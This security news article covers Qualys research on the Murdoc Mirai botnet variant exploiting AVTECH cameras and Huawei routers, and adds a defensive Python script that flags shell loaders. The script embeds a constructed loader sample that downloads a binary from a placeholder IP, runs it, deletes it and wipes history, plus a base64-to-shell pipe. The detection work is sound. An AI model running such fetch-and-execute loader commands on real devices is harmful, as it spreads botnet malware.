In a new and ongoing large-scale cyber campaign, Qualys researchers have uncovered a variant of the infamous Mirai botnet called the Murdoc Botnet. This variant exploits vulnerabilities in widely used AVTECH Cameras and Huawei HG532 routers, allowing malicious actors to compromise devices and build vast botnet networks for additional malicious activities.
“The Mirai botnet was first publicly identified in late August 2016, and its effects are still felt today,” says Jason Soroko, Senior Fellow at Sectigo. “The threat actors have identified widespread entry points into enterprise and consumer networks, demonstrating that a single outdated or unpatched device can compromise an entire environment.”
This Murdoc Botnet variant has enhanced capabilities, amplifying its reach and efficiency in compromising devices.
Targeting Vulnerable Devices
The Murdoc Botnet campaign is a continuation of Mirai botnet activities, with notable use of ELF files and shell scripts to deploy malware on compromised devices.
The new variant, which began its nefarious operations in mid-2024, specifically targets vulnerable IoT devices, including AVTECH cameras and routers like the Huawei HG532.
The malware leverages known vulnerabilities, CVE-2024-7029 in AVTECH IP cameras and CVE-2017-17215 in Huawei HG532 routers, to gain access and deploy a new botnet payload. A historical timeline of the campaign shows a surge in attacks since July 2024, with activity peaking in certain months.
Qualys’ investigation into the geographical impact of the Murdoc Botnet revealed that Malaysia was the most affected country, followed by Thailand, Mexico, and Indonesia.
Technical Insights
During their ongoing threat-hunting analysis, the Qualys Threat Research Unit found substantial evidence of large-scale distribution of Mirai malware. Using a query on the FOFA internet-asset search engine, the team identified more than 1,300 affected IP addresses, highlighting the growing scale of a campaign that continues to exploit vulnerable devices worldwide.
An investigation of the campaign’s command-and-control (C2) structure uncovered more than 100 distinct servers responsible for controlling compromised devices and distributing the Mirai malware payload.
These servers enable the botnet’s growth, issuing commands and handling communication with infected devices. Researchers uncovered detailed information on the C2 servers to reveal the embedded payloads and the way in which the botnet operates.
A Variant of Mirai
The Murdoc Botnet shares many characteristics with its predecessor, Mirai, and primarily targets Unix-like systems, in practice the embedded Linux firmware that runs on the affected cameras and routers. The botnet exploits vulnerabilities in devices such as AVTECH cameras and Huawei routers, using the two known exploits detailed above to deliver its payload.
Once a device is compromised, the loader runs a short, scripted sequence of commands. For instance, the stage targeting AVTECH cameras uses shell scripts to fetch the malicious binaries, mark them executable, run them, and then remove the files to erase traces of the attack.
The research also found more than 500 samples of ELF and shell script files, indicating the widespread nature of the attack. The final botnet payload is designed to execute additional malicious activities, including DDoS attacks, on infected devices.
Soroko says the use of shell scripts and ELF binaries to load new payloads reflects how Mirai operators have learned to adapt core techniques like command injection and network reconnaissance for use against a growing range of platforms, even leveraging base64 encoding or common admin utilities (GTFOBins) to slip through the security nets and hinder incident response.
In-Depth Shell Script Analysis
The researchers conducted a detailed analysis of the shell scripts used by the botnet. These scripts are responsible for fetching and executing the malware payload: the payload is typically downloaded with wget, made executable with chmod, run, and then deleted to cover tracks.
The loaders also rely on GTFOBins, the catalogue of legitimate Unix binaries (wget, chmod and similar utilities among them) that can be abused to download, execute or hide files. Because those utilities are already present on the compromised devices, the scripts need no tooling of their own to run.
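A practical check for the loader pattern described in this section (fetch with wget, chmod, run, delete) is to triage captured shell scripts or command lines, for example from a honeypot or a process-audit log, for that chain; it is also the kind of monitoring the recommendations later in this article ask for. The following Python script is an added example for this article, not Qualys' code and not a sample from the campaign. The loader, base64 and benign scripts it scores are constructed here, and the 198.51.100.7 address (a documentation-range IP), URLs and file names in them are invented.

```python
"""Heuristic triage of shell loaders of the kind described in this section.

Added example for this article, not Qualys' code and not a sample from the
campaign. The scripts it scores are constructed for illustration; the IP
address, paths and file names in them are invented.
"""
import re
from dataclasses import dataclass, field

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/mnt/")

URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\";|&>]+")
OUTFILE_RE = re.compile(r"\s-[oO]\s+(\S+)")                 # wget -O / curl -o
CHMOD_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\s+(\S+)")
RM_RE = re.compile(r"\brm\s+-[a-zA-Z]*f[a-zA-Z]*\s+(\S+)")
B64_PIPE_RE = re.compile(r"\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:sh|bash|busybox\s+sh)\b")
WIPE_RE = re.compile(r"history\s+-c|\brm\b.*/var/log")


@dataclass
class Verdict:
    score: int = 0
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold chosen here: a full fetch->chmod->run chain alone is enough.
        return self.score >= 3


def split_commands(script: str) -> list:
    """Split a script into simple commands on newlines, ';', '&&', '||' and '|'."""
    return [c.strip() for c in re.split(r"\n|;|&&|\|\||\|", script) if c.strip()]


def _basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def triage(script: str) -> Verdict:
    """Score a shell script for the Mirai-style fetch -> chmod -> run -> wipe pattern."""
    v = Verdict(urls=sorted(set(URL_RE.findall(script))))
    fetched, chmodded, executed, removed = set(), set(), set(), set()

    # Pipe-based tricks must be checked before the '|' split destroys them.
    for line in script.splitlines():
        if B64_PIPE_RE.search(line):
            v.score += 2
            v.indicators.append("base64-decoded payload piped into a shell")
        if WIPE_RE.search(line):
            v.score += 1
            v.indicators.append("shell history or log wiping")

    for cmd in split_commands(script):
        words = cmd.split()
        tool = words[0]
        if tool == "busybox" and len(words) > 1:          # busybox wget ... / busybox sh ...
            tool, words = words[1], words[1:]
        if tool in DOWNLOADERS:
            fetched.update(_basename(u) for u in URL_RE.findall(cmd))
            m = OUTFILE_RE.search(cmd)
            if m:
                fetched.add(_basename(m.group(1)))
        elif tool in ("sh", "bash") and len(words) > 1 and not words[1].startswith("-"):
            executed.add(_basename(words[1]))
        elif tool.startswith("./") or tool.startswith(STAGING_DIRS):
            executed.add(_basename(tool))
        m = CHMOD_RE.search(cmd)
        if m:
            chmodded.add(_basename(m.group(1)))
        m = RM_RE.search(cmd)
        if m:
            removed.add(_basename(m.group(1)))

    # Tie the stages together by basename so one dropped file forms one chain.
    chain = fetched & chmodded & executed
    if chain:
        v.score += 3
        v.indicators.append(f"download->chmod->execute chain on {sorted(chain)}")
    elif fetched & executed:
        v.score += 2
        v.indicators.append(f"downloaded file executed directly: {sorted(fetched & executed)}")
    wiped = fetched & removed
    if wiped:
        v.score += 1
        v.indicators.append(f"downloaded file deleted after use: {sorted(wiped)}")
    return v


# Constructed samples: the loader mimics the wget -> chmod -> run -> rm sequence
# described above; 198.51.100.7 is a documentation-range address, not real C2.
LOADER_SAMPLE = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.7/bins/x86.bin -O x86.bin
chmod +x x86.bin
./x86.bin avtech
rm -rf x86.bin
history -c
"""
B64_SAMPLE = "echo 'Y2QgL3RtcA==' | base64 -d | sh\n"       # payload decodes to 'cd /tmp'
BENIGN_SAMPLE = """#!/bin/sh
cd /opt/app
wget https://example.org/releases/app-1.2.tar.gz -O /opt/app/app.tar.gz
tar xzf /opt/app/app.tar.gz
./install.sh
"""

if __name__ == "__main__":
    for name, sample in [("loader", LOADER_SAMPLE), ("base64", B64_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        verdict = triage(sample)
        print(f"{name}: score={verdict.score} suspicious={verdict.suspicious} urls={verdict.urls}")
        for indicator in verdict.indicators:
            print("   -", indicator)
```

Stages are matched on file basenames so that `wget -O x86.bin`, `chmod +x x86.bin`, `./x86.bin` and `rm -rf x86.bin` are tied together as one chain and the download URL is kept as an indicator of compromise. A base64 pipe alone, or a deleted download alone, raises the score without crossing the threshold, which keeps an ordinary installer script (fetch an archive, unpack it, run the shipped installer) below it. The threshold, staging directories and downloader list are starting points to tune for the device population being monitored.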
Conclusion & Recommendations
This ongoing campaign illustrates the evolving nature of Mirai variants and the persistent threat they pose to IoT devices. The campaign’s use of known exploits to target devices like IP cameras and routers underscores the need for proactive security measures to defend against botnet attacks.
To protect against such attacks, Qualys recommends the following steps:
- Monitor suspicious activities: Regularly inspect for unusual processes or network traffic originating from untrusted binaries or shell scripts.
- Exercise caution with shell scripts: Never execute shell scripts from unknown or untrusted sources.
- Patch systems and firmware: Keep all devices updated with the latest firmware and security patches to protect against known vulnerabilities.
A Persistent, Evolving Threat
According to James Scobey, Chief Information Security Officer at Keeper Security, the discovery of the Murdoc Botnet reveals the persistent and evolving threat IoT vulnerabilities pose to global cybersecurity.
“By exploiting weak points in AVTECH cameras and Huawei routers, attackers create botnets capable of launching powerful DDoS attacks. To counteract such threats, organizations must prioritize better IoT security practices, including hardening device configurations and managing passwords and secrets to restrict unauthorized control.”
Moreover, he says malefactors will often use these exploits to move laterally within victim networks. “Applying zero-trust principles, including the use of Privileged Access Management (PAM), is critical to preventing additional exploitation. The attackers’ ability to re-leverage previously exploited vulnerabilities underscores the importance of proactive patching and vigilance against recurring threats.”
“As the botnet’s capabilities expand, defenders must shift toward proactive measures such as routine patching, continuous monitoring for anomalous traffic, and strict access controls to mitigate the impact of a single compromised IoT device in a networked ecosystem,” Soroko concludes.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.